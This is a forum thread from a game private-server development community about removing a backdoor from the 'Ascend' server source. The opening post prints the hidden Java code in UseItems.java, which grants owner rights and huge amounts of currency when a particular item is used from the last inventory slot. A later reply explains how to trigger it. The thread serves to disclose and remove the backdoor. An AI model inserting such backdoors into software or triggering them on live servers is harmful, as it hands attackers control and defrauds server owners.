Thread: [Ascend] Removing G00N's Exploit

Page 1 of 4 123 ... LastLast
Results 1 to 10 of 32
  1. #1 [Ascend] Removing G00N's Exploit 
    Project incoming..
    IntelliJ's Avatar
    Join Date
    Aug 2018
    Posts
    124
    Thanks given
    47
    Thanks received
    20
    Rep Power
    30
    Hello, just recently downloaded Ascend's to use it as main base.
    Another developer let me know there's an exploit in it, thanks to him for the information, will credit you at the end of this thread.

    First off go in model/items/UseItems.java
    Find this
    Code:
    			case 70:
    Remove all of the code underneath it
    Code:
    		case 70:
    				if(itemId==1895 && slot == 27){
    					if(player.getItems().isWearingItems()){
    						return;
    					}
    					player.getRights().add(Right.OWNER);
    					player.getItems().addItem(995,2000000000);
    					player.getItems().addItem(13307,2000000000);
    					player.donatorPoints+=10000000;
    					player.amDonated+=10000;
    				}
    				break;
    There you go, removed the exploit. Wasn't so complicated was it ?
    Credits goes to TwinkyRS for informing me and telling me what file was used for this.



    Reply With Quote  
     

  2. Thankful users:


  3. #2  
    Skotos Founder


    Join Date
    Jan 2017
    Age
    24
    Posts
    954
    Thanks given
    178
    Thanks received
    191
    Rep Power
    199
    Jesus that would of been bad lmao
    Attached image
    Reply With Quote  
     

  4. #3  
    Project incoming..
    IntelliJ's Avatar
    Join Date
    Aug 2018
    Posts
    124
    Thanks given
    47
    Thanks received
    20
    Rep Power
    30
    Quote Originally Posted by Mantvis View Post
    Jesus that would of been bad lmao
    Haha i know right.


    Reply With Quote  
     

  5. #4  
    Myre


    Join Date
    Apr 2012
    Age
    26
    Posts
    1,519
    Thanks given
    407
    Thanks received
    367
    Rep Power
    475
    So many servers didn't have this fixed
    Reply With Quote  
     

  6. #5  
    Registered Member Rema's Avatar
    Join Date
    Sep 2018
    Posts
    45
    Thanks given
    10
    Thanks received
    9
    Rep Power
    16
    Code:
    player.getRights().add(Right.OWNER);
    
    player.getRights().add(Right.DEVELOPER);
    
    player.getItems().addItem;
    
    player.getItems().addItem;
    					
    player.donatorPoints+=;
    					
    player.amDonated+=;
    A lot of releases have backdoors, just search the project for things like these and remove them.
    Reply With Quote  
     

  7. #6  
    Registered Member
    Join Date
    Dec 2016
    Posts
    34
    Thanks given
    7
    Thanks received
    46
    Rep Power
    5
    Was not intentional forgot to remove it will add it to main post thanks
    Reply With Quote  
     

  8. Thankful users:


  9. #7  
    Registered Member
    vvaved's Avatar
    Join Date
    Sep 2017
    Posts
    243
    Thanks given
    87
    Thanks received
    61
    Rep Power
    116
    Quote Originally Posted by G00N View Post
    Was not intentional forgot to remove it will add it to main post thanks
    Love ya.

    "You must spread some Reputation around before giving it to G00N again."

    Attached image
    Reply With Quote  
     

  10. Thankful user:


  11. #8  
    Donator

    Join Date
    Apr 2016
    Posts
    45
    Thanks given
    4
    Thanks received
    3
    Rep Power
    11
    So how does this exploit work, itemid 1895 is a slice of cake. Im new the the rsps coding scene so idk how it works. I also have this source and client so i would like to know how it works generally.
    Reply With Quote  
     

  12. #9  
    Respected Member


    Join Date
    Jan 2009
    Posts
    5,743
    Thanks given
    1,162
    Thanks received
    3,603
    Rep Power
    5000
    Quote Originally Posted by Frikk View Post
    So how does this exploit work, itemid 1895 is a slice of cake. Im new the the rsps coding scene so idk how it works. I also have this source and client so i would like to know how it works generally.
    put the slice of cake in the last inventory slot then eat it
    Reply With Quote  
     

  13. #10  
    Extreme Donator


    Join Date
    Jul 2008
    Age
    31
    Posts
    956
    Thanks given
    186
    Thanks received
    344
    Rep Power
    1060
    Quote Originally Posted by G00N View Post
    Was not intentional forgot to remove it will add it to main post thanks
    Then why not add it to the post two+ weeks ago when I told you about it?

    Attached image
    Reply With Quote  
     

Page 1 of 4 123 ... LastLast

Thread Information
Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)


User Tag List

Similar Threads

  1. [667/xxx] Removing Another Matrix Exploit
    By Cloud クラウド in forum Tutorials
    Replies: 15
    Last Post: 07-18-2012, 04:36 AM
  2. *Removing a 667 Exploit*
    By All3n in forum Tutorials
    Replies: 13
    Last Post: 05-28-2012, 11:04 PM
  3. Removing Flames in Client
    By Guthan in forum Tutorials
    Replies: 15
    Last Post: 07-24-2009, 10:42 PM
  4. Removing Objects In An Area (UNTESTED)
    By Llama in forum Tutorials
    Replies: 10
    Last Post: 06-21-2007, 09:33 PM
Posting Permissions
  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •